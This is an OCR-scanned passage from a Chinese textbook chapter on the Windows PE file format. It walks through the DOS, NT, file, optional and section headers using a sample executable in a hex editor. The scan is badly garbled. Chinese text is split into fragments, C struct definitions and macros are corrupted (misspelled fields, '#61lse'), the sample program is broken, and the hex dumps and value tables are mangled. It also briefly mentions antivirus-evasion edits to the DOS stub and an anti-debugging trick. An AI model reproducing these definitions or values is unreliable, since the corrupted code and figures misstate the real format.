数 进行 修改 的 ， 有 具体 请 参考 相关 的 连接 器 的 参数 。 

2. PE 头 

PE 头 部 保存 着 Windows 系统 加 载 可 执行 文件 的 重要 信息 。PE 头 部 由 IMAGE 
NT_HEADERS 定义 。 从 该 结构 体 的 定义 名 称 可 以 看 出 ，IMAGE NT_HEADERS 由 多 个 结构 
体 组 合 而 成 ， 包 括 IMAGE NT SIGNATRUE、IMAGE FILE HEADER 和 IMAGE OPTIO 
NAL HEADER 三 部 分 。PE 头 部 在 PE 文件 中 的 位 置 不 是 固定 不 变 的 ，PE 头 部 的 位 置 由 DOS 
头 部 的 某 个 字段 给 出 。 

3. 节 表 

程序 的 组 织 按照 各 属性 的 不 同 而 被 保存 在 不 同 的 节 中 ,在 PE 头 部 之 后 就 是 一 个 数组 结 
构 的 节 表 。 描 述 节 表 的 结构 体 是 IMAGE _ SECTION _ HEADER， 如 果 PE 文件 中 有 NN 个 节 ， 
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那么 节 表 就 是 由 N 个 IMAGE SECTION HEADER 组 成 的 数组 。 节 表 中 存储 了 各 个 节 的 属性 、 
文件 位 置 、 内 存 位 置 等 相关 的 信息 。 

4. 节 表 数据 

PE 文件 的 真正 程序 部 分 就 保存 在 节 数 据 中 。 在 PE 结构 中 ， 有 几 个 节 表 ， 就 对 应 有 几 个 
节 表 的 数据 。 根 据 节 表 的 属性 、 地 址 等 信息 ， 程 序 的 数据 就 分 布 在 节 表 指定 的 位 置 中 。 


6.2 详解 PE 文件 结构 


PSDK 的 头 文件 Winnt.h 包含 了 PE 文件 结构 的 定义 格式 。PE 头 文 件 分 为 32 位 和 64 位 
版 本 。64 位 的 PE 结构 是 对 32 位 的 PE 结构 做 了 扩展 ， 这 里 主要 讨论 32 位 的 PE 文件 结构 。 
对 于 64 位 的 PE 文件 结构 ， 读 者 可 以 自行 查阅 资料 进行 学 习 。 


6.2.1 DOS 头 部 IMAGE_DOS_HEADER 详解 


对 于 一 个 PE 文件 来 说 ， 最 开始 的 位 置 就 是 一 个 DOS 程序 。DOS 程序 包含 了 一 个 DOS 
头 部 和 一 个 DOS 程序 体 , DOS 头 部 是 用 来 装载 DOS 程序 的 , DOS 程序 也 就 是 如 图 6-1 中 的 
那个 DOS 存根 。 也 就 是 说 ，DOS 头 是 用 来 装载 DOS 存根 用 的 。 保 留 这 部 分 内 容 是 为 了 与 
DOS 系统 相 兼 容 。 当 Win32 程序 在 DOS 下 被 执行 时 ，DOS 存根 程序 会 有 礼貌 地 输出 “This 
program cannot be run in DOS mode.” 字 样 对 用 户 进行 提示 。 

虽然 DOS 头 部 是 为 了 装载 DOS 程序 的 , 但 是 DOS 头 部 中 的 一 个 字段 保存 着 指向 PE 头 
部 的 位 置 。DOS 头 在 Winnt.h 头 文件 中 被 定义 为 IMAGE DOS_HEADER， 其 定义 如 下 : 


typedef struct -IMAGE DOS HEADER { 
WORD e magic; 
WORD e_cblp; 
WORD E_CP 
WORD e_ crlce; 
WORD e_ cparhdr; 
WORD € minalloc; 
WORD e maxalloc’; 
WORD E_SS7 
WORD esSPY 
WORD e Csum; 
WORD ©,ip? 
WORD eCcsF 
WORD & lfarlc; 
WORD e_ovnor; 
WORD e res[4]; 
WORD eS oemid; 
WORD © _ oeminfo; 
WORD € res2[10]; 
LONG e, lfanew:; 
} IMAGE DOS HEADER, *PIMAGE DOS HEADER; 


该 结构 体 中 需要 掌握 的 字段 只 有 两 个 ,分 别 是 第 一 个 字段 e magic 和 最 后 一 个 字段 
e_lfanew 字段 。 

e magic 字段 是 一 个 DOS 可 执行 文件 的 标识 符 ， 占 用 2 字 节 。 该 位 置 保存 着 的 字符 是 
“MZ”。 该 标识 符 在 Winnth 头 文件 中 有 一 个 宏 定 义 ， 有 具体 如 下 : 


#define IMAGE DOS_SIGNATURE 0x5A4D 
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e_lfanew 字段 中 保存 着 PE 头 的 起 始 位 置 。 

在 VC 下 创建 一 个 简单 的 “Win32 Application ”程序 ， 然 后 生成 一 个 可 执行 文件 ,用 于 学 
习 和 分 析 PE 文件 结构 的 组 织 。 

程序 代码 如 下 : 


#include <Windows.h> 


int WINAPI WinMain (IN HINSTANCE hinstance, 
IN HINSTANCE hpPrevinstance, 
IN LPSTR lpCmadLine, 
IN int nSshowCemd) 
MessageBox (NULL, "hello world!", "hello"”", MB OK); 


return 0» 


旦 序 的 功能 只 是 弹出 一 个 MessageBox 对 话 框 。 为 了 减 小 程序 的 体积 ， 使 用 “Win32 
Release” 方 式 进行 编译 连接 ， 并 把 编译 好 的 程序 用 C32Asm 打开 。C32Asm 是 一 个 反 汇 编 与 
十 六 进 制 编辑 于 一 体 的 程序 ， 其 界面 如 图 6-2 所 示 。 

在 图 6-2 上 选择 “十 六 进 制 模式 ” 单 选 按钮 ， 单 击 “ 确 定 ” 按 钮 ， 程 序 就 被 C32Asm 程 
序 以 十 六 进 制 的 模式 打开 了 ， 如 图 6-3 所 示 。 
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图 6-2 C32Asm 程序 界面 图 6-3 十 六 进 制 编辑 状态 下 的 C32Asm 


在 图 6-3 中 可 以 看 到 ， 在 文件 偏 移 为 0x00000000 的 位 置 处 保存 着 2 字 节 的 内 容 0x5A 4D， 
用 ASCII 码 表示 则 是 “MZ”。 图 6-3 中 的 前 两 个 字 节 明明 写 着 “4D 5A”， 为 什么 说 的 是 0x5A4D 
呢 ? 到 上 面 看 Winnth 头 文件 中 定义 的 那个 宏 ,， 也 写 着 0x5A4D, 这 是 为 什么 呢 ? 如 果 读 者 还 
记得 前 面 章 节 中 介绍 的 字 节 顺序 的 内 容 ， 那 么 就 应 该 明白 为 什么 这 么 写 了 。 这 里 使 用 的 系统 
是 小 尾 方式 存储 ， 即 高 位 保存 高 字 节 ， 低 位 保存 低 字 节 。 这 个 概念 是 很 重要 的 ， 希 望 读 者 不 
要 忘记 。 


Dy 注 : 在 这 里 ， 如 果 以 ASCI| 码 的 形式 去 考察 6 magic 字段 的 话 ， 那 么 值 的 确 是 “4D 5A” 两 个 字 节 ,但 是 

为 什么 宕 定义 是 “0x5A4D” 呢 ? 因为 IMAGE_DOS_HEADER 对 于 e_magic 的 定义 是 一 个 WORD 类 型 。 
定义 成 WORD 类 型 ， 在 代码 中 进行 比较 时 可 以 直接 使 用 数值 比较 ; 而 如 果 定 义 成 CHAR 型 ， 那 么 比较 时 
就 相对 不 是 太 方便 了 。 


在 图 6-3 中 0x0000003C 的 位 置 处 ， 就 是 IMAGE DOS HEADER 的 e lfanew 字段 ， 该 字 
段 保存 着 PE 头 部 的 起 始 位 置 。PE 头 部 的 地 址 是 多 少 呢 ? 是 0xC8000000 吗 ? 如 果 是 ， 就 错 
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了 ， 原 因 还 是 字 节 序 的 问题 。 因 此 ，e_lfanew 的 值 为 0x000000C8。 在 文件 偏 移 为 0x000000C8 
处 保存 着 “50 45 00 00”， 与 之 对 应 的 ASCII 字符 为 “PE\Q\0”。 这 里 就 是 PE 头 部 开始 的 位 置 。 

“PE\0\0” 和 IMAGE DOS_HEADER 之 间 的 内 容 是 DOS 存根 ， 就 是 一 个 没什么 太 大 用 
处 的 DOS 程序 。 由 于 这 个 程序 本 身 没 有 什么 利用 的 价值 ， 因 此 这 里 就 不 对 这 个 DOS 程序 做 
介绍 了 。 在 免 杀 技术 、PE 文件 大 小 优化 等 技术 中 会 对 该 部 分 进行 处 理 ， 可 以 将 该 部 分 直接 删 
除 ， 然 后 将 PE 头 部 整体 向 前 移动 ， 也 可 以 将 一 些 配 置 数据 保存 在 此 处 等 。 选 中 DOS 存根 程 
序 ， 也 就 是 从 0x00000040 处 一 直到 0x000000C7 处 的 内 容 ， 然 后 单 击 右键 选择 “填充 ”命令 ， 
在 弹出 的 “填充 数据 ”对 话 框 中 ， 选 中 “使 用 十 六 进 制 填充 ” 单 选 按钮 ， 在 其 后 的 编辑 框 中 
输入 “00”， 单 击 “ 确 定 ” 按 钮 ， 该 过 程 如 图 6-4 和 图 6-5 所 示 。 
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图 6-4 填充 数据 图 6-5 填充 后 的 数据 


把 DOS 存根 部 分 填充 完毕 以 后 , 单 击 工具 栏 上 的 “保存 ?按钮 对 修改 后 的 内 容 进行 保存 。 
保存 时 会 提示 “是 否 进行 备份 ” 选择 “是 ”， 这 样 修改 后 的 文件 就 被 保存 了 。 找 到 文件 然后 
运行 ， 程 序 中 的 MessageBox 对 话 框 依旧 弹出 ， 说 明 这 里 的 内 容 的 确 无 关 紧 要 了 。DOS 存根 
部 分 经 党 由 于 各 种 需要 而 保存 其 他 数据 ， 因 此 这 种 填充 操作 较为 常见 。 有 具体 填充 什么 数据 ， 

请 读者 在 今后 的 学 习 中 自行 发 挥 想象 。 


6.2.2 PE 头 部 IMAGE_NT_HEADERS 详解 


DOS 头 是 为 了 兼容 DOS 系统 而 遗留 的 ， DOS 头 中 的 最 后 一 个 字 节 给 出 了 PE 头 的 位 置 。 
PE 头 部 是 真正 用 来 装载 Win32 程序 的 头 部 ，PE 头 的 定义 为 IMAGE NT_HEADERS， 该 结构 
体 包含 PE 标识 符 、 文 件 头 IMAGE FILE _ HEADER 和 可 选 头 IMAGE _ OPTIONAL HEADER 


3 部 分 。IMAGE NT HEADERS 是 一 个 宏 ， 其 定义 如 下 : 
#ifdef WIN64 


typedef IMAGE NT HEADERS64 IMAGE NT HEADERS:; 

typedef PIMAGE NT HEADERS64 PIMAGE NT HEADERS; 

#define IMAGE FIRST SECTION (ntheader) IMAGE FIRST SECTION64 (ntheader) 
#61lse 

typedef IMAGE NT HEADERS32 IMAGE NT HEADERS; 

typedef PIMAGE NT HEADERS32 PIMAGE NT HEADERS; 

#define IMAGE FIRST SECTION (ntheader) IMAGE FIRST SECTION32 (ntheader) 
#endif 


该 头 分 为 32 位 和 64 位 两 个 版 本 ， 其 定义 依赖 于 是 否定 义 了 _WIN64。 这 里 只 讨论 32 位 
的 PE 文件 格式 ， 来 看 一 下 IMAGE NT HEADERS32 的 定义 ， 具 体 如 下 : 








锯 医 丁 峡 对 ” 埋 @ 潍 


| 








第 6 章 ”加 密 与 解密 








遇 改 灿 遇 车 山 加 小 


typedef struct _IMAGE NT HEADERS { 

DWORD Signature’; 

IMAGE FILE HEADER FileHeader; 

IMAGE OPTIONAL HEADER32 OptionalHeader; 
} IMAGE NT HEADERS32, *PIMAGE NT HEADERS32; 


该 结构 体 中 的 Signature 就 是 PE 标识 符 ， 标识 该 文件 是 否 是 PE 文件 。 该 部 分 占 4 字 节 ， 


即 “50 45 00 00”。 该 部 分 可 以 参考 图 6-3。Signature 在 Winnt.h 中 有 一 个 宏 定 义 如 下 : 
#asfine IMAGELNT_LSITGNATURB 0x00004550 /7 EEOO 


该 值 非常 重要 。 如 果 要 简单 地 判断 一 个 文件 是 否 是 PE 文件 ， 首 先 要 判断 DOS 头 部 的 开 
台 字 节 是 否 是 “MZ”。 如 果 是 “MZ” 头 部 ， 则 通过 DOS 头 部 找到 PE 头 部 ， 接 着 判断 PE 头 
部 的 前 四 个 字 节 是 否 为 “PE\0\0”。 如 果 是 的 话 ， 则 说 明 该 文件 是 一 个 有 效 的 PE 文件 。 

在 PE 头 中 , 除了 IMAGE NT _SIGNATURE 以 外 , 还 有 两 个 重要 的 结构 体 , 分 别 是 IMAGE 


_FILE HEADER (文件 头 ) 和 IMAGE _OPTIONAL HEADER (可 选 头 )。 这 两 个 头 在 PE 头 


部 中 占据 重要 的 位 置 ， 因 此 需要 详细 介绍 这 两 个 结构 体 。 
6.2.3 文件 头 部 IMAGE_FILE_HEADER 详解 


文件 头 结构 体 IMAGE _ FILE HEADER 是 IMAGE NT_HEADERS 结构 体 中 的 一 个 结构 
体 ， 紧 接 在 PE 标识 符 的 后 面 。IMAGE FILE HEADER 结构 体 的 大 小 为 20 字 节 ， 起 始 位 置 
为 0x000000CC， 结 束 位 置 在 0x000000DF， 如 图 6-6 所 示 。 
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图 6-6 IMAGE _ FILE_HEADER 在 PE 文件 中 的 位 置 


IMAGE _ FILE HEADER 的 起 始 位 置 取决 于 PE 头 部 的 起 始 位 置 ，PE 头 部 的 位 置 取 雇 于 
IMAGE DOS_HEADER 中 e lfanew 的 位 置 。 除 了 IMAGE DOS_HEADER 的 起 始 位 置 外 ， 
其 他 头 部 的 位 置 都 依赖 于 PE 头 部 的 起 始 位 置 。 

IMAEG _ FILE HEADER 结构 体 包含 了 PE 文件 的 一 些 基础 信息 ， 其 结构 体 的 定义 如 下 : 


人 
// 文件 头 部 格式 
好 


typedef struct _IMAGE FILE HEADER { 
WORD Machine; 
WORD NumberOfSections; 
DWORD TimeDateStamp; 
DWORD PointerToSymbolTable; 
DWORD NumberOfSymbols; 
WORD SizeOfOptionalHeader; 
WORD Characteristics; 
} IMAGE FILE HEADER, *PIMAGE FILE HEADER; 


#define IMAGE SIZEOF FILE HEADER 20 

下 面 介绍 该 结构 的 各 字段 。 

Machine: 该 字段 是 WORD 类 型 , 占用 2 字 节 。 该 字段 表示 可 执行 文件 的 目标 CPU 类 型 。 
该 字段 的 取 值 如 图 6-7 所 示 。 

在 图 6-6 中 ，Machine 字段 的 值 为 “4C 01”， 即 0x014C， 也 就 是 支持 Intel 类 型 的 CPU。 
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图 6-7 CPU 类 型 取 值 







NumberOfSections: 该 字段 是 WORD 类 型 ， 占 用 两 个 字 节 。 该 字段 表示 PE 文件 的 节 区 的 
个 数 。 在 图 6-6 中 ， 该 字段 的 值 为 “03 00”， 即 为 0x0003， 也 就 是 说 明 该 PE 文件 的 节 区 有 3 个 。 

TimeDataStamp: 该 字段 表明 文件 是 何 时 被 创建 的 ， 这 个 值 是 自 1970 年 1 月 1 日 以 来 用 
格林 威 治 时 间 计 算 的 秒 数 。 

PointerToSymbolTable: 该 字段 很 少 被 使 用 ， 这 里 不 做 介绍 。 

NumberOfSymbols: 该 字段 很 少 被 使 用 ， 这 里 不 做 介绍 。 

SizeOfOptionalHeader: 该 字段 为 WORD 类 型 ， 占 用 两 个 字 节 。 该 字段 指定 IMAGE 
OPTION AL_HEADER 结构 的 大 小 。 在 图 6-6 中 ， 该 字段 的 值 为 “E0 00”， 即 0x00E0， 也 就 
是 说 IMAGE OPTIONAL HEADER 的 大 小 为 0x00E0。 注 意 ， 在 计算 IMAGE OPTIONAL 
HEADER 的 大 小 时 ， 应 该 从 IMAGE FILE HEADER 结构 中 的 SizeOfOptionalHeader 字段 指 
定 的 值 来 获取 ， 而 不 应 该 直接 使 用 sizeof (IMAGE _ OPTIONAL _ HEADER) 来 计算 。 由 该 字 
段 可 以 看 出 ，IMAGE_OPTIONAL HEADER 结构 体 的 大 小 可 能 是 会 改变 的 。 

Characteristics: 该 字段 为 WORD 类 型 ， 占 用 2 字 节 。 该 字段 指定 文件 的 类 型 ， 其 取 值 如 
图 6-8 所 示 。 







[TAGE FILE_RELOCS_STRIPPED |0x000T| 文件 中 不 存在 草 定 位 信息 











IMAGE _ FILE EXECUTABLE IMAGE ”|0x0002| 文 件 可 拟 行 
IMAGE FILE LINE NUMS STRIPPED |0x0004| 行 号 信息 已 从 文件 中 移 除 
壬 号 信 










IMAGE _ FILE_ LOCAL SYMS_STRIPPED |0x0008| 符 号 信息 已 从 文件 中 移 除 
0x2000 
| IMAGE FILE SYSTEM |0xl000| 系 统 文件 

IMAGE FILE 32BIT MACHINE 0x0100 


图 6-8 文件 类 型 的 取 值 


从 图 6-6 中 可 知 ， 该 字段 的 的 值 为 “0F 01”， 即 “0x010F”。 该 值 表示 该 文件 运行 的 目标 
平台 为 32 位 平台 , 是 一 个 可 执行 文件 ， 且 不 存在 重 定 位 信息 , 行 号 信息 和 符号 信息 已 从 文件 
中 移 除 。 


6.2.4 可 选 头 部 IMAGE_OPTIONAL_HEADER 详解 


IMAGE OPTINAL _ HEADER 在 几乎 所 有 的 参考 书 中 都 被 称 作 “可 选 头 ”。 虽 然 被 称 作 可 
选 头 ， 但 是 该 头 部 不 是 一 个 可 选 的 ， 而 是 一 个 必须 存在 的 头 ， 不 可 以 没有 。 该 头 被 称 作 “可 
选 头 ”的 原因 是 在 该 头 的 数据 目录 数组 中 ， 有 的 数据 目录 项 是 可 有 可 无 的 ， 数 据 目 录 项 部 分 
是 可 选 的， 因此 称 为 “可 选 头 ”。 而 笔者 觉得 如 果 称 之 为 “选项 头 ” 会 更 好 一 点 。 不 管 程序 如 
何 ， 只 要 读者 能 够 知道 该 头 是 必须 存在 的 ， 且 数据 目录 项 部 分 是 可 选 的 ， 就 可 以 了 。 

可 选 头 紧 挨 着 文件 头 ， 文 件 头 的 结束 位 置 在 0x000000DF， 那 么 可 选 头 的 起 始 位 置 为 
0x000000E0。 可 选 头 的 大 小 在 文件 头 中 已 经 给 出 ， 其 大 小 为 0x00E0 字 节 (十 进 制 为 224 字 
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= 0x000001BF， 如 图 6-9 所 示 。 


B888886D6:| B8 38 81 51 90 88 886 88 688 88 88 88 ES8 88 BF 81 
0808000E0: 
9B68099F8: 
B8660186: 
666686118: 
88888120: 
60888130: 
BBBB9138: 
890999158: 
B0008168: 
9099998179: 
66808091806: 
B8888198: 
B88601A6: 
B86081B6: 
O081C0:| 2E 74 65 78 74 99 88 898 CE 35 88 88 88 18 88 B88 


可 选 头 的 内 容 














图 6-9 


可 选 头 的 定位 有 一 定 的 技巧 性 ， 起 始 位 置 的 定位 相对 比较 容易 找到 ， 按 照 PE 标识 
寻找 是 非常 简单 的 。 可 选 头 结束 位 置 其 实 也 非常 容易 找到 。 通 常情 况 下 〈 注 意 这 里 是 指 通常 
情况 下 , 不 是 手工 构造 的 PE 文件 ), 可 选 头 的 结尾 后 面 跟 的 是 第 一 项 节 表 的 名 称 。 观 察 图 6-9， 
文件 偏 移 0x000001C0 处 的 节 名 称 为 也 就 是 说 ， 可 选 头 的 结束 位 置 在 0x000001C0 
偏 移 的 前 一 字 节 ， 即 0x000001BF 处 。 

可 选 头 是 对 文件 头 的 一 个 补充 。 文 件 头 主要 描述 文件 的 相关 信息 ， 而 可 选 头 主要 用 来 管 
里 PE 文件 被 操作 系统 装载 时 所 需要 的 信息 。 该 头 同样 有 32 位 版 本 与 64 位 版 本 之 分 


IMAGE OPTIONAL HEADER 是 一 个 宏 ， 其 定义 如 下 : 
#ifdef WIN64 


“ .text”， 





亚 











De 


typedef IMAGE OPTIONAL HERDER64 IMAGE OPTIONAL HEADER; 

typedef PIMAGE OPTIONAL HEADERG64 PIMAGE OPTIONAL HEADER; 

#define IMAGE SIZEQOF NT OPTIONAL HEADER IMAGE_ SIZEOF NT OPTIONAL64 HEADER 
#define IMAGE NT OPTIONAI, HDR MAGIC IMAGE NT OPTIONRATL HDR64 MAGIC 
#else 

typedef IMAGE OPTIONAL HEADER32 IMAGE OPTIONAL HEADER; 

typedef PIMAGE OPTIONAL HEADER32 PIMAGE OPTIONAL HEADER; 

#define IMAGE SIZEOF NT OPTIONAL HEADER IMAGE STZEOF NT -OPTIONAL32 HEADER 


#define 


IMAGE NT_ OPTIONAL HDR MAGIC 


IMAGE NT OPTIONAL HDR32 MAGIC 


#endif 


32 位 版 本 和 64 位 版 本 的 选择 是 根据 是 否定 义 了 _WIN64 而 决定 的 ， 这 里 只 





的 版 本 。IMAGE OPTIONAL HEADER32 的 定义 如 下 : 
Wi 
/7 可 选 的 头 部 格式 
A 
typedef struct TIMAGE OPTIONAL HEADER { 
ppg 
// 标准 字段 
LV 
WORD Magic; 
BYTE MajorLinkerVersion; 
BYTE MinorLinkerVersion; 
DWORD SizeOfCode; 
DWORD SizeOfIinitializedData; 
DWORD SizeOfUninitializedData; 
DWORD AddressOfpEntryPolnt: 
DWORD BaseOfCode; 
DWORD BaseOfData; 
pa 


4 讨论 其 32 位 
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// 其 他 NT 字段 

/7 

DWORD ImageBase; 和 
DWORD SectionAlignment; 章 
DWORD FileAlignment; 

WORD MajorOperatingSystemVersion; 

WORD MinorOperatingSystemVersion; 加 
WORD MajorIimageVersion; 密 
WORD MinorimageVersion; 与 
WORD MajorsubsystemVersion; 解 
WORD MinorSubsystemVersion; 密 
DWORD Wan32VersionValue7 

DWORD SizeOflimage; 

DWORD SizeOfHeaders; | 


DWORD CheckSum:; 

WORD Subsystem; 

WORD DliiCharacteristics; 

DWORD SizeOfStackReserve; 

DWORD SizeOfStackCommit; 

DWORD SizeOfHeapReserve; 

DWORD SizeOfHeapCommit; 

DWORD LoaderFlags; 

DWORD NumberOfRvaAndSizes; 

IMAGE DATA DIRECTORY DataDirectory[IMAGE NUMBEROF DIRECTORY ENTRIES];? 
} IMAGE OPTIONAL HEADER32, *PIMAGE OPTIONAL HEADER32; 


该 结构 体 的 成 员 变 量 非常 多 ， 为 了 能 够 更 好 地 掌握 该 结构 体 ， 这 里 对 结构 体 的 成 员 变量 
一 一 进行 介绍 。 
Magic: 该 成 员 变 量 指定 了 文件 的 状态 类 型 ， 状 态 类 型 部 分 取 值 如 图 6-10 所 示 。 
So 
图 6-10 ”Magic 变量 取 值 














MajorLinkerVersion: 主 连接 版 本 号 。 

MinorLinkerVersion: 次 连接 版 本 号 。 

SizeOfCode: 代码 节 的 大 小 。 如 果 有 多 个 代码 节 的 话 ; 该 值 是 所 有 代码 节 大 小 的 总 和 ( 通 
常 只 有 一 个 代码 节 )， 该 处 是 指 所 有 包含 可 执行 属性 的 节 的 大 小 。 

SizeOfInitializedData: 已 初始 化 数据 块 的 大 小 。 

SizeOfUninitializedData: 未 初始 化 数据 块 的 大 小 。 

AddressOfEntryPoint: 程序 执行 的 入 口 地 址 。 该 地 址 是 一 个 相对 虚拟 地 址 ， 简 称 EP 
(EntryPoint)， 这 个 值 指向 了 程序 第 一 条 要 执行 的 代码 。 程 序 如 果 被 加 壳 后 会 修改 该 字段 的 值 。 
在 脱 壳 的 过 程 中 找到 了 加 壳 前 该 字段 的 值 ， 就 说 明 找到 了 原始 入 口 点 ， 原 始 入 口 点 被 称 为 
OEP。 该 字段 的 地 址 指向 的 不 是 main() 函 数 的 地 址 ， 也 不 是 WinMain() 函 数 的 地 址 ， 而 是 运行 
库 的 启动 代码 的 地 址 。 对 于 DLL 来 说 ， 这 个 值 的 意义 不 大 ， 因 为 DLL 甚至 可 以 没有 DIIMain0) 
函数 ， 没 有 DIIMain(0 只 是 无 法 捕获 装载 和 钾 载 DLL 时 的 4 个 消息 。 如 果 在 DLL 装载 或 印 载 
时 没有 需要 进行 处 理 的 事件 ， 可 以 将 DIIMain() 函 数 省 略 掉 。 

BaseOfCode: 代码 段 的 起 始 相对 虚拟 地 址 。 

BaseOfData: 数据 段 的 起 始 相 对 虚拟 地 址 。 

ImageBase: 文件 被 装 入 内 存 后 的 首选 建议 装载 地 址 。 对 于 EXE 文件 来 说 ， 通 常情 况 下 ， 
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该 地 址 就 是 装载 地 址 : 对 于 DLL 文件 来 说 ， 可 能 就 不 是 其 装 入 内 存 后 的 地 址 了 。 
SectionAlignment: 节 表 被 装 入 内 存 后 的 对 齐 值 。 节 表 被 映射 到 内 存 中 需要 对 其 的 单位 。 
在 Win32 下 ， 通 常情 况 下 ， 该 值 为 0x1000， 也 就 是 4KB 大 小 。Windows 操作 系统 的 内 存 分 
页 一 般 为 4KB。 
FileAlignment: 节 表 在 文件 中 的 对 齐 值 。 通 常情 况 下 ， 该 值 为 0x1000 或 0x200。 在 文件 
对 齐 值 为 0x1000 时 ， 由 于 与 内 存 对 齐 值 相同 ， 可 以 加 快 装载 速度 。 而 文件 对 齐 值 为 0x200 
时 ， 可 以 占用 相对 较 少 的 磁盘 空间 。0x200 是 512 字 节 ， 通 常 磁 盘 的 一 个 扇 区 即 为 512 字 节 。 


册 费 灯 册 车 山口 诬 


el py 注 : 程序 无 论 是 在 内 存 中 还 是 磁盘 上 ， 都 无 法 恰好 满足 SectionAlignment 和 FileAlignment 值 的 倍数 ， 在 
不 足 的 情况 下 需要 补 0 值 ， 这 样 就 导致 节 与 节 之 间 存在 了 无 用 的 空隙 。 这 些 空隙 对 于 病毒 之 类 程序 而 言 就 
有 了 可 利用 的 价值 。 


MajorOperatingSystemVersion: 要 求 最 低 操 作 系 统 的 主 版 本 号 。 
MinorOperatingSystemVersion: 要 求 最 低 操作 系统 的 次 版 本 号 。 

MajorImageVersion: 可 执行 文件 的 主 版 本 号 。 

MinorImageVersion: 可 执行 文件 的 次 版 本 号 。 

Win32VersionValue: 该 成 员 变 量 是 被 保留 的 。 

SizeOfImage: 可 执行 文件 装 入 内 存 后 的 总 大 小 。 该 大 小 按 内 存 对 齐 方式 对 齐 。 
SizeOfHeaders: 整个 PE 头 部 的 大 小 。 这 个 PE 头 部 泛 指 DOS 头 、PE 头 、 节 表 的 总 和 大 小 。 
CheckSum: 校 验 和 值 。 对 于 EXE 文件 通常 为 0; 对 于 SYS 文件 ， 则 必须 有 一 个 校 验 和 。 
SubSystem: 可 执行 文件 的 子 系统 类 型 。 该 值 如 图 6-11 所 示 。 











ET 7 | 
IMAGE SUBSYSTEM UNRKNOWN | 未 知 子 系统 

不 需要 子 系 统 
IMAGE SUBSYSTEM WINDOWS GUI 图 形 子 系统 


IMAGE SUBSYSTEM _ WINDOWS GUI | 3 | 控制 台子 系统 
图 6-11 SubSystem 的 取 值 范围 


DlICharacteristics: 指定 DLL 文件 的 属性 ， 该 值 大 部 分 时 候 为 0。 

SizeOfStackReserve: 为 线程 保留 的 栈 大 小 。 

SizeOfStackCommit: 为 线程 已 提交 的 栈 大 小 。 

SizeOfHeapReserve: 为 线程 保留 的 堆 大 小 。 

SizeOfHeapCommit: 为 线程 已 提交 的 堆 大 小 。 

LoaderFlags: 被 废弃 的 成 员 值 。MDSN 上 的 原 话 为 “This member is obsolete”。 但 是 该 值 
在 某 些 情况 下 还 是 会 被 用 到 的 ， 比 如 针对 原始 的 低 版 本 的 OD 来 说 ， 修 改 该 值 会 起 到 反 调 试 
的 作用 。 

NumberOfRvaAndSizes: 数据 目录 项 的 个 数 。 该 个 数 在 PSDK 中 有 一 个 宏 定义 ， 具 体 如 下 : 


#define IMAGE NUMBEROF DIRECTORY ENTRIES 16 

DataDirectory: 数据 目录 表 ， 由 NumberOfRvaAndSize 个 IMAGE DATA _DIRECTORY 
结构 体 组 成 。 该 数组 包含 输入 表 、 输 出 表 、 资 源 、 重 定位 等 数据 目录 项 的 RVA《〈 相 对 虚拟 地 
址 ) 和 大 小 。IMAGE DATA_DIRECTORY 结构 体 的 定义 如 下 : 
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WY 
// 目录 格式 
Va 


typedef struct _IMAGE DATA DIRECTORY { 
DWORD VirtualAddress; 
DWORD Size; 
} IMAGE DATA DIRECTORY, *PIMAGE DATA DIRECTORY; 


该 结构 体 的 第 一 个 变量 为 该 目录 项 的 相对 虚拟 地 址 的 起 始 值 ， 第 二 个 是 该 目录 项 的 长 度 。 
数据 目录 中 的 部 分 成 员 在 数组 中 的 索引 如 图 6-12 所 示 ， 详 细 的 索引 定义 请 参考 Winnth 头 文件 。 


IMAGE DIRECTORY ENTRY BASERELOC 
IMAGE DIRECTORY ENTRY IAT 1 


图 6-12 数据 目录 部 分 成 员 在 数组 中 的 索引 





在 数据 目录 中 ， 并 不 是 所 有 的 目录 项 都 会 有 值 ， 很 多 目录 项 的 值 都 为 0。 因 为 很 多 目录 
项 的 值 为 0， 所 以 说 数据 目录 项 是 可 选 的 。 

可 选 头 的 结构 体 就 介绍 完了 ， 希 望 读者 按照 该 结构 体 中 各 成 员 变 量 的 含义 自行 学 习 可 选 
头 中 的 十 六 进 制 值 的 含义 。 只 有 参考 结构 体 的 说 明 去 对 照 分 析 PE 文件 格式 中 的 十 六 进 制 值 ， 
才能 更 好 、 更 快 地 掌握 PE 结构 。 


6.2.5 IMAGE_SECTION_HEADER 详解 


节 表 的 位 置 在 IMAGE _ OPTIONAL HEADER 的 后 面 ， 节 表 中 的 每 个 IMAGE _ SECTION 
_HEADER 中 都 存放 着 可 执行 文件 被 映射 到 内 存 中 所 在 位 置 的 信息 ， 节 的 个 数 由 IMAGE _ 
FILE HEADER 中 的 NumberOfSections 给 出 。 节 表 数 据 如 图 6-13 所 示 。 


:| 88 98 88 99 88 86 99 99 68 68 99 96 86 886 86 69 
HE2E 7h 65 78 74 88 60 80 CE 35 60 080 088 18 9808 fe 
:| I 
HG8 9 8 699 29 80 99 68 2E 72 64 61 74 61 99 Bf 
:| 97 08 0 99 59 89 69 99 190 90 99 B9 58 699 88 


HIG8 De De 88 88 968 60 680 686 G6 08 86 hG 688 80 #4 
BN2E 64 61 74 61 69 99 88 FC 29 89 898 68 68 96 04 
ee 3e 6e da 86 69 99 99 869 690 89 89 98 9 98 9 
9:| EBL LL LL 56 66 66 96 698 66 86 868 
:| 88 88 68 99 88 099 969 66 8 08 869 89 98 898 988 98 





图 6-13 IMAGE SECTION _ HEADER 位 置 的 数据 内 容 


由 IMAGE _ SECTION _HEADER 结构 体 构成 的 节 表 起 始 位 置 在 0x000001C0 处 ， 最 后 一 
个 节 表 项 的 结束 位 置 在 0x00000237 处 。IMAGE _ SECTION _HEADER 的 大 小 为 40 字 节 ， 该 
文件 有 3 个 节 表 ， 因 此 共 占 用 了 120 字 节 。 


IMAGE _ SECTION HEADER 结构 体 的 定义 如 下 : 
typedef struct _IMAGE SECTION HEADER { 
BYTE Name [IMAGE .SIZEOF SHORT NAME]; 
union 1 
DWORD PhysicalAddress’; 
DWORD VirtaalSizez7 
JUMLSG) 
DWORD VirtualAddress; 
DWORD SizeOfRawData; 
DWORD PointerToRawData; 
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DWORD PointerToRelocations; 
DWORD PointerToLinenumbers; 
WORD NumberOfRelocations; 
WORD NumberOfLinenumbers; 
DWORD Characteristics; 
} IMAGE. SECTION HEADER, *PIMAGE SECTION HEADER; 


#define IMAGE SIZEOF SECTION HEADER 40 

这 个 结构 体 相对 于 IMAGE OPTIONAL HEADER 结构 体 来 说 ， 成 员 变 量 少 很 多 。 下 面 
